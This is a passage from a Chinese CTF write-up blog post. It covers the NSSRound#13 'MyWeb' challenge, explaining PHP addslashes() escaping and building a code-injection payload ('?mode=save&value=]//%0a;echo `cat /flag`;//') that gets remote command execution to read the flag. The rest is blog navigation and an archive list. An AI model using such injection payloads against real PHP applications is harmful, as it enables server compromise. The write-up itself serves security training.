<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$data = [&#x27;apple&#x27;, &#x27;banana&#x27;];</span><br></pre></td></tr></table></figure>

<ul>
<li>然后输出数组内容。</li>
</ul>
<p>我们还需要注意save模式中<code>addslashes()</code>函数的作用：</p>
<p><code>addslashes()</code> 是 PHP 的内置函数，用来在字符串中为以下 <strong>4 个字符</strong> 自动添加反斜杠转义（backslash）：</p>
<ul>
<li>单引号 <code>&#39;</code> -&gt; <code>\&#39;</code></li>
<li>双引号 <code>&quot;</code> -&gt; <code>\&quot;</code></li>
<li>反斜杠 <code>\</code> -&gt; <code>\\</code></li>
<li>NUL 字符（ASCII 0，<code>&quot;\0&quot;</code>） -&gt; <code>\0</code></li>
</ul>
<p>总结一下，我们需要先选择save模式，然后通过value传递payload，然后再选择read模式读取达到RCE。</p>
<p>接下来是编写payload的问题：为了能够使我们的payload能执行，我们先要闭合第一个<code>]</code>这里前面已经提到过，通过传递<code>]//</code>，之后<code>\n</code>换行在新的行中写要执行的php代码<code>echo &#39;cat/flag&#39;//</code></p>
<p>又因为<code>addslashes()</code>函数会把单引号转义，我们把<code>&#39;</code>替换成反引号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">]//\n;echo `cat /flag`;//</span><br></pre></td></tr></table></figure>

<p>换行跟空格需要base64编码一下，最后得到的payload如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?mode=save&amp;value=]//%0a;echo%20`cat%20/flag`;//</span><br></pre></td></tr></table></figure>

<p>最后<code>?mode=read</code>读取到flag</p>
<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-11-04_22-05-58.png" alt="PixPin_2025-11-04_22-05-58"></p>
<h1 id="references"><a href="#references" class="headerlink" title="references"></a>references</h1><p>[<a target="_blank" rel="noopener" href="https://blog.csdn.net/Leaf_initial/article/details/131560501">NSSCTF Round #13]web专项赛wp_[nssround#13 basic]timetrcer-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/gitblog_09122/article/details/142229324">Flask Session Cookie Manager 安装和配置指南-CSDN博客</a></p>
<p>[<a target="_blank" rel="noopener" href="https://www.cnblogs.com/magic123/articles/17512689.html">NSSRound#13 Basic]ez_factors - Magic水瓶 - 博客园</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/Paradoxis/Flask-Unsign">GitHub - Paradoxis&#x2F;Flask-Unsign：命令行工具，用于通过猜测密钥来获取、解码、暴力破解和制作 Flask 应用程序的会话 cookie。 — GitHub - Paradoxis&#x2F;Flask-Unsign: Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.</a></p>
<p>[<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_73512445/article/details/133964825">NSSRound#13 Basic] 刷题记录_[nssround#13 basic]flask?jwt?(hard)-CSDN博客</a></p>

    </article>
    <!-- license -->
        <div class="license-wrapper">
            <p>原文作者：<a href="https://everythingis-ok.github.io">seora</a>
            <p>原文链接：<a href="https://everythingis-ok.github.io/2025/11/04/NSSCTF-Round-13-%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/">https://everythingis-ok.github.io/2025/11/04/NSSCTF-Round-13-%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/</a>
            <p>发表日期：<a href="https://everythingis-ok.github.io/2025/11/04/NSSCTF-Round-13-%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/">November 4th 2025, 10:08:49 pm</a>
            <p>更新日期：<a href="https://everythingis-ok.github.io/2025/11/04/NSSCTF-Round-13-%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/">November 5th 2025, 1:23:30 pm</a>
            <p>版权声明：本文采用<a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    <!-- paginator -->
    <ul class="post-paginator">
        <li class="next">
                <div class="nextSlogan">Next Post</div>
                <a href="/2025/11/06/BJDCTF-2020-easy-md5/" title="[BJDCTF 2020]easy_md5">
                    <div class="nextTitle">[BJDCTF 2020]easy_md5</div>
                </a>
        </li>
        <li class="previous">
                <div class="prevSlogan">Previous Post</div>
                <a href="/2025/11/04/b01lers-2020-Scarambled/" title="[b01lers 2020]Scarambled">
                    <div class="prevTitle">[b01lers 2020]Scarambled</div>
                </a>
        </li>
    </ul>
    <!-- comment -->
        <div class="post-comment">
            <!-- 来必力 City 版安装代码 -->

            
            
            
            <!-- utteranc评论 -->

            <!-- partial('_partial/comment/changyan') -->
            <!--PC版-->

            
            
            
        </div>
    <!-- timeliness note -->
    <!-- idea from: https://hexo.fluid-dev.com/posts/hexo-injector/#%E6%96%87%E7%AB%A0%E6%97%B6%E6%95%88%E6%80%A7%E6%8F%90%E7%A4%BA -->
    <!-- Mathjax -->
</main>

                <!-- profile -->
            </div>
            <footer class="footer footer-unloaded">
    <!-- social  -->
        <div class="social">
                            <a href="mailto:12345@qq.com" class="iconfont-archer email" title="email" ></a>
                <a href="//github.com/everythingis-ok" class="iconfont-archer github" target="_blank" title="github"></a>
                <span class="iconfont-archer qq" title="qq">
                    <img class="profile-qr" src="/source/images/qq_qr.png" />
                </span>
                <a href="/atom.xml" class="iconfont-archer rss" target="_blank" title="rss"></a>

        </div>
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- website approve for Chinese user -->
    <!-- 不蒜子  -->
        <div class="busuanzi-container">
                <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
        </div>
</footer>

        </div>
        <!-- toc -->
            <div class="toc-wrapper toc-wrapper-loding" style=    top:50vh;
>
                <div class="toc-catalog">
                    <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
                </div>
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#NSSCTF-Round-13-%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.</span> <span class="toc-text">[NSSCTF Round #13]部分题目复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#NSSRound-13-Basic-flask-jwt"><span class="toc-number">1.1.</span> <span class="toc-text">[NSSRound#13 Basic]flask?jwt?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NSSRound-13-Basic-ez-factors"><span class="toc-number">1.2.</span> <span class="toc-text">[NSSRound#13 Basic]ez_factors</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NSSRound-13-Basic-flask-jwt-hard"><span class="toc-number">1.3.</span> <span class="toc-text">[NSSRound#13 Basic]flask?jwt?(hard)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NSSRound-13-Basic-MyWeb"><span class="toc-number">1.4.</span> <span class="toc-text">[NSSRound#13 Basic]MyWeb</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#references"><span class="toc-number">2.</span> <span class="toc-text">references</span></a></li></ol>
            </div>
        <!-- sidebar -->
        <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
        <div class="sidebar-panel-archives">
    <!-- 在 ejs 中将 archive 按照时间排序 -->
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    <div class="total-and-search">
        <div class="total-archive">
        Total : 42
        </div>
        <!-- search  -->
    </div>
    <div class="post-archive">
            <div class="archive-year"> 2026 </div>
            <ul class="year-list">
        <li class="archive-post-item">
            <span class="archive-post-date">05/25</span>
            <a class="archive-post-title" href="/2026/05/25/LitCTF2026-%E5%85%A8%E6%96%B9%E5%90%91wp/">LitCTF2026 全方向wp</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">05/24</span>
            <a class="archive-post-title" href="/2026/05/24/%C2%96-NSSRound-6-Team-%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/">[NSSRound#6 Team] 题目复现</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">05/08</span>
            <a class="archive-post-title" href="/2026/05/08/NSS%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-BCACTF-2024-Static/">NSS刷题记录 [BCACTF 2024]Static</a>
        </li>
                </ul>
            <div class="archive-year"> 2025 </div>
            <ul class="year-list">
        <li class="archive-post-item">
            <span class="archive-post-date">12/14</span>
            <a class="archive-post-title" href="/2025/12/14/polarCTFweb%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-%E7%AE%80%E5%8D%95/">polarCTFweb刷题记录(简单)</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">12/14</span>
            <a class="archive-post-title" href="/2025/12/14/polarCTFweb%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-%E7%AE%80%E5%8D%95-02/">polarCTFweb刷题记录(简单)02</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">12/11</span>
            <a class="archive-post-title" href="/2025/12/11/%E8%AE%B0%E5%BD%95%E4%B8%80%E7%A7%8D%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%9A%84%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95/">记录一种文件上传的绕过方法</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">11/10</span>
            <a class="archive-post-title" href="/2025/11/10/ISITDTU-2019-EasyPHP/">[ISITDTU 2019]EasyPHP</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">11/07</span>
            <a class="archive-post-title" href="/2025/11/07/NSSRound-7/">NSSRound#7</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">11/06</span>
            <a class="archive-post-title" href="/2025/11/06/BJDCTF-2020-easy-md5/">[BJDCTF 2020]easy_md5</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">11/04</span>
            <a class="archive-post-title" href="/2025/11/04/NSSCTF-Round-13-%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/">[NSSCTF Round #13]部分题目复现</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">11/04</span>
            <a class="archive-post-title" href="/2025/11/04/b01lers-2020-Scarambled/">[b01lers 2020]Scarambled</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/26</span>
            <a class="archive-post-title" href="/2025/10/26/%E9%99%87%E5%89%91%E6%9D%AF-2021-%E7%AE%80%E5%8D%95%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90%EF%BC%88%E9%97%AE3%EF%BC%89/">[陇剑杯 2021]简单日志分析（问3）</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/24</span>
            <a class="archive-post-title" href="/2025/10/24/SWPU-2020-%E5%A5%97%E5%A8%83/">[SWPU 2020]套娃</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/23</span>
            <a class="archive-post-title" href="/2025/10/23/%C2%96SWPUCTF-2022-%E6%96%B0%E7%94%9F%E8%B5%9B-%E5%A5%87%E5%A6%99%E7%9A%84MD5/">[SWPUCTF 2022 新生赛]奇妙的MD5</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/23</span>
            <a class="archive-post-title" href="/2025/10/23/SWPU-2019-%E4%BC%9F%E5%A4%A7%E7%9A%84%E4%BE%A6%E6%8E%A2/">[SWPU 2019]伟大的侦探</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/21</span>
            <a class="archive-post-title" href="/2025/10/21/HNCTF-2022-WEEK3-Fun-php/">[HNCTF 2022 WEEK3]Fun_php</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/21</span>
            <a class="archive-post-title" href="/2025/10/21/%E9%99%87%E5%89%91%E6%9D%AF-2021-webshell%EF%BC%88%E9%97%AE6%EF%BC%89/">[陇剑杯 2021]webshell（问6）</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/20</span>
            <a class="archive-post-title" href="/2025/10/20/SUSCTF-2022-Tanner/">[SUSCTF 2022]Tanner</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/19</span>
            <a class="archive-post-title" href="/2025/10/19/%C2%96%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%9A%8F%E4%BE%BF%E6%B3%A8-1%E3%80%90SQL%E6%B3%A8%E5%85%A5%E3%80%91/">[强网杯 2019]随便注 1【SQL注入】</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/18</span>
            <a class="archive-post-title" href="/2025/10/18/php%E4%BB%A3%E7%A0%81%E4%B9%8Bcreate-function-%E5%87%BD%E6%95%B0/">php代码之create_function()函数</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/17</span>
            <a class="archive-post-title" href="/2025/10/17/XXE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">XXE漏洞学习</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/16</span>
            <a class="archive-post-title" href="/2025/10/16/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">文件包含漏洞学习</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/21</span>
            <a class="archive-post-title" href="/2025/07/21/Flask-SSTI-labs-%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/">Flask-SSTI-labs 通关记录</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/18</span>
            <a class="archive-post-title" href="/2025/07/18/SSTI%E6%BC%8F%E6%B4%9E/">SSTI漏洞</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/17</span>
            <a class="archive-post-title" href="/2025/07/17/windows11%E7%B3%BB%E7%BB%9F%E4%B8%8B%E6%90%AD%E5%BB%BA%E8%8E%B7%E5%8F%96-Vulhub%E9%9D%B6%E5%9C%BA/">windows11系统下搭建获取 Vulhub靶场</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/15</span>
            <a class="archive-post-title" href="/2025/07/15/2025%E5%BE%A1%E7%BD%91%E6%9D%AF%E7%BA%BF%E4%B8%8B%E8%B5%9B/">2025御网杯线下赛</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/10</span>
            <a class="archive-post-title" href="/2025/07/10/picgoCTF2025wp/">picgoCTF2025wp</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">05/20</span>
            <a class="archive-post-title" href="/2025/05/20/NTFS%E6%95%B0%E6%8D%AE%E6%B5%81%E9%9A%90%E5%86%99/">NTFS数据流隐写</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">04/24</span>
            <a class="archive-post-title" href="/2025/04/24/Hexo-fluid%E4%B8%BB%E9%A2%98-%E6%B7%BB%E5%8A%A0%E5%88%86%E7%B1%BB%E5%8F%8A%E6%A0%87%E7%AD%BE/">Hexo fluid主题-添加分类及标签</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">04/24</span>
            <a class="archive-post-title" href="/2025/04/24/TGCTF-ez-zip/">TGCTF ez_zip</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">04/21</span>
            <a class="archive-post-title" href="/2025/04/21/polarctf-session%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">polarctf session文件包含</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">04/06</span>
            <a class="archive-post-title" href="/2025/04/06/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9F%BA%E7%A1%80/">php反序列化基础</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">04/06</span>
            <a class="archive-post-title" href="/2025/04/06/Linux%E5%B8%B8%E8%A7%81%E6%96%87%E4%BB%B6%E5%92%8C%E7%9B%AE%E5%BD%95%E6%93%8D%E4%BD%9C%E5%91%BD%E4%BB%A4/">Linux常见文件和目录操作命令</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">04/06</span>
            <a class="archive-post-title" href="/2025/04/06/RCE%EF%BC%88%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%89%E7%BB%95%E8%BF%87/">RCE（任意命令执行）绕过</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">04/06</span>
            <a class="archive-post-title" href="/2025/04/06/%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2/">信息泄露</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/18</span>
            <a class="archive-post-title" href="/2025/03/18/CTFhub%E6%96%87%E4%BB%B6%E5%A4%B4%E6%A3%80%E6%9F%A5-00%E6%88%AA%E6%96%AD/">CTFhub文件头检查 00截断</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/18</span>
            <a class="archive-post-title" href="/2025/03/18/CTFhub%E5%89%8D%E7%AB%AF%E9%AA%8C%E8%AF%81-MIME%E7%BB%95%E8%BF%87/">CTFhub前端验证 MIME绕过</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/18</span>
            <a class="archive-post-title" href="/2025/03/18/CTFhub-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%97%A0%E9%99%90%E5%88%B6/">CTFhub 文件上传无限制</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/16</span>
            <a class="archive-post-title" href="/2025/03/16/%E4%B8%80%E4%BA%9BSQL%E6%B3%A8%E5%85%A5%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0RCE/">一些SQL注入文件上传RCE</a>
        </li>
                </ul>
            <div class="archive-year"> 2024 </div>
            <ul class="year-list">
        <li class="archive-post-item">
            <span class="archive-post-date">12/06</span>
            <a class="archive-post-title" href="/2024/12/06/web%E9%A2%98%E7%9B%AEwp/">web题目wp</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">12/05</span>
            <a class="archive-post-title" href="/2024/12/05/%E8%BF%99%E4%B8%AA%E5%8E%8B%E7%BC%A9%E5%8C%85%E6%9C%89%E7%82%B9%E9%BA%BB%E7%83%A6/">这个压缩包有点麻烦</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">10/27</span>
            <a class="archive-post-title" href="/2024/10/27/week2/">week2</a>
        </li>
            </ul>
    </div>
</div>

        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
            <span class="sidebar-tag-name" data-tags="00截断">
                <span class="iconfont-archer">&#xe606;</span>
                00截断
            </span>
            <span class="sidebar-tag-name" data-tags="CTFhub">
                <span class="iconfont-archer">&#xe606;</span>
                CTFhub
            </span>
            <span class="sidebar-tag-name" data-tags="文件上传">
                <span class="iconfont-archer">&#xe606;</span>
                文件上传
            </span>
            <span class="sidebar-tag-name" data-tags="Ctfhub">
                <span class="iconfont-archer">&#xe606;</span>
                Ctfhub
            </span>
            <span class="sidebar-tag-name" data-tags="前端验证">
                <span class="iconfont-archer">&#xe606;</span>
                前端验证
            </span>
            <span class="sidebar-tag-name" data-tags="MIME绕过">
                <span class="iconfont-archer">&#xe606;</span>
                MIME绕过
            </span>
            <span class="sidebar-tag-name" data-tags="博客搭建">
                <span class="iconfont-archer">&#xe606;</span>
                博客搭建
            </span>
            <span class="sidebar-tag-name" data-tags="php代码审计">
                <span class="iconfont-archer">&#xe606;</span>
                php代码审计
            </span>
            <span class="sidebar-tag-name" data-tags="0宽隐写">
                <span class="iconfont-archer">&#xe606;</span>
                0宽隐写
            </span>
            <span class="sidebar-tag-name" data-tags="Linux命令">
                <span class="iconfont-archer">&#xe606;</span>
                Linux命令
            </span>
            <span class="sidebar-tag-name" data-tags="NSSCTF">
                <span class="iconfont-archer">&#xe606;</span>
                NSSCTF
            </span>
            <span class="sidebar-tag-name" data-tags="隐写">
                <span class="iconfont-archer">&#xe606;</span>
                隐写
            </span>
            <span class="sidebar-tag-name" data-tags="NTFS数据隐写">
                <span class="iconfont-archer">&#xe606;</span>
                NTFS数据隐写
            </span>
            <span class="sidebar-tag-name" data-tags="python反编译">
                <span class="iconfont-archer">&#xe606;</span>
                python反编译
            </span>
            <span class="sidebar-tag-name" data-tags="RCE">
                <span class="iconfont-archer">&#xe606;</span>
                RCE
            </span>
            <span class="sidebar-tag-name" data-tags="编码">
                <span class="iconfont-archer">&#xe606;</span>
                编码
            </span>
            <span class="sidebar-tag-name" data-tags="rce4">
                <span class="iconfont-archer">&#xe606;</span>
                rce4
            </span>
            <span class="sidebar-tag-name" data-tags="压缩包修复">
                <span class="iconfont-archer">&#xe606;</span>
                压缩包修复
            </span>
            <span class="sidebar-tag-name" data-tags="TGCTF">
                <span class="iconfont-archer">&#xe606;</span>
                TGCTF
            </span>
            <span class="sidebar-tag-name" data-tags="XXE">
                <span class="iconfont-archer">&#xe606;</span>
                XXE
            </span>
            <span class="sidebar-tag-name" data-tags="create_function()函数">
                <span class="iconfont-archer">&#xe606;</span>
                create_function()函数
            </span>
            <span class="sidebar-tag-name" data-tags="php反序列化">
                <span class="iconfont-archer">&#xe606;</span>
                php反序列化
            </span>
            <span class="sidebar-tag-name" data-tags="pop链构造">
                <span class="iconfont-archer">&#xe606;</span>
                pop链构造
            </span>
            <span class="sidebar-tag-name" data-tags="SSTI">
                <span class="iconfont-archer">&#xe606;</span>
                SSTI
            </span>
            <span class="sidebar-tag-name" data-tags="提权">
                <span class="iconfont-archer">&#xe606;</span>
                提权
            </span>
            <span class="sidebar-tag-name" data-tags="polarctf">
                <span class="iconfont-archer">&#xe606;</span>
                polarctf
            </span>
            <span class="sidebar-tag-name" data-tags="session文件包含">
                <span class="iconfont-archer">&#xe606;</span>
                session文件包含
            </span>
            <span class="sidebar-tag-name" data-tags="NewStarCTF2024">
                <span class="iconfont-archer">&#xe606;</span>
                NewStarCTF2024
            </span>
            <span class="sidebar-tag-name" data-tags="编码解码">
                <span class="iconfont-archer">&#xe606;</span>
                编码解码
            </span>
            <span class="sidebar-tag-name" data-tags="图片隐写">
                <span class="iconfont-archer">&#xe606;</span>
                图片隐写
            </span>
            <span class="sidebar-tag-name" data-tags="LSB隐写">
                <span class="iconfont-archer">&#xe606;</span>
                LSB隐写
            </span>
            <span class="sidebar-tag-name" data-tags="md5碰撞">
                <span class="iconfont-archer">&#xe606;</span>
                md5碰撞
            </span>
            <span class="sidebar-tag-name" data-tags="堆叠注入">
                <span class="iconfont-archer">&#xe606;</span>
                堆叠注入
            </span>
            <span class="sidebar-tag-name" data-tags="SQL注入">
                <span class="iconfont-archer">&#xe606;</span>
                SQL注入
            </span>
            <span class="sidebar-tag-name" data-tags="报错注入">
                <span class="iconfont-archer">&#xe606;</span>
                报错注入
            </span>
            <span class="sidebar-tag-name" data-tags="预编译语句">
                <span class="iconfont-archer">&#xe606;</span>
                预编译语句
            </span>
            <span class="sidebar-tag-name" data-tags="更改表名">
                <span class="iconfont-archer">&#xe606;</span>
                更改表名
            </span>
            <span class="sidebar-tag-name" data-tags="handel语句">
                <span class="iconfont-archer">&#xe606;</span>
                handel语句
            </span>
            <span class="sidebar-tag-name" data-tags="RCE绕过">
                <span class="iconfont-archer">&#xe606;</span>
                RCE绕过
            </span>
            <span class="sidebar-tag-name" data-tags="文件包含">
                <span class="iconfont-archer">&#xe606;</span>
                文件包含
            </span>
            <span class="sidebar-tag-name" data-tags="php伪协议">
                <span class="iconfont-archer">&#xe606;</span>
                php伪协议
            </span>
            <span class="sidebar-tag-name" data-tags="信息泄露">
                <span class="iconfont-archer">&#xe606;</span>
                信息泄露
            </span>
            <span class="sidebar-tag-name" data-tags="Misc">
                <span class="iconfont-archer">&#xe606;</span>
                Misc
            </span>
            <span class="sidebar-tag-name" data-tags="已知明文攻击">
                <span class="iconfont-archer">&#xe606;</span>
                已知明文攻击
            </span>
            <span class="sidebar-tag-name" data-tags="文件分离">
                <span class="iconfont-archer">&#xe606;</span>
                文件分离
            </span>
            <span class="sidebar-tag-name" data-tags="zip伪加密">
                <span class="iconfont-archer">&#xe606;</span>
                zip伪加密
            </span>
            <span class="sidebar-tag-name" data-tags="日志分析">
                <span class="iconfont-archer">&#xe606;</span>
                日志分析
            </span>
            <span class="sidebar-tag-name" data-tags="流量分析">
                <span class="iconfont-archer">&#xe606;</span>
                流量分析
            </span>
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
        缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98
    </div> 
    <div class="sidebar-tags-list"></div>
</div>

        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
        <span class="sidebar-category-name" data-categories="web">
            <span class="iconfont-archer">&#xe60a;</span>
            web
        </span>
        <span class="sidebar-category-name" data-categories="博客搭建">
            <span class="iconfont-archer">&#xe60a;</span>
            博客搭建
        </span>
        <span class="sidebar-category-name" data-categories="misc">
            <span class="iconfont-archer">&#xe60a;</span>
            misc
        </span>
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>

    </div>
</div>

        <!-- site-meta -->
        <script>
    var siteMetaRoot = "/"
    if (siteMetaRoot === "undefined") {
        siteMetaRoot = '/'
    }
    var siteMeta = {
        url: "https://everythingis-ok.github.io",
        root: siteMetaRoot,
        author: "seora"
    }
</script>

        <!-- import experimental options here -->
        <!-- Custom Font -->

        <!-- main func -->
        <script src="/scripts/main.js"></script>
        <!-- fancybox -->
        <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.36/dist/fancybox/fancybox.umd.js" onload="window.Fancybox.bind('[data-fancybox]')" defer></script>
        <!-- algolia -->
        <!-- busuanzi -->
            <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
        <!-- async load share.js -->
            <script src="/scripts/share.js" async></script>
        <!-- mermaid -->
    </body>
</html>
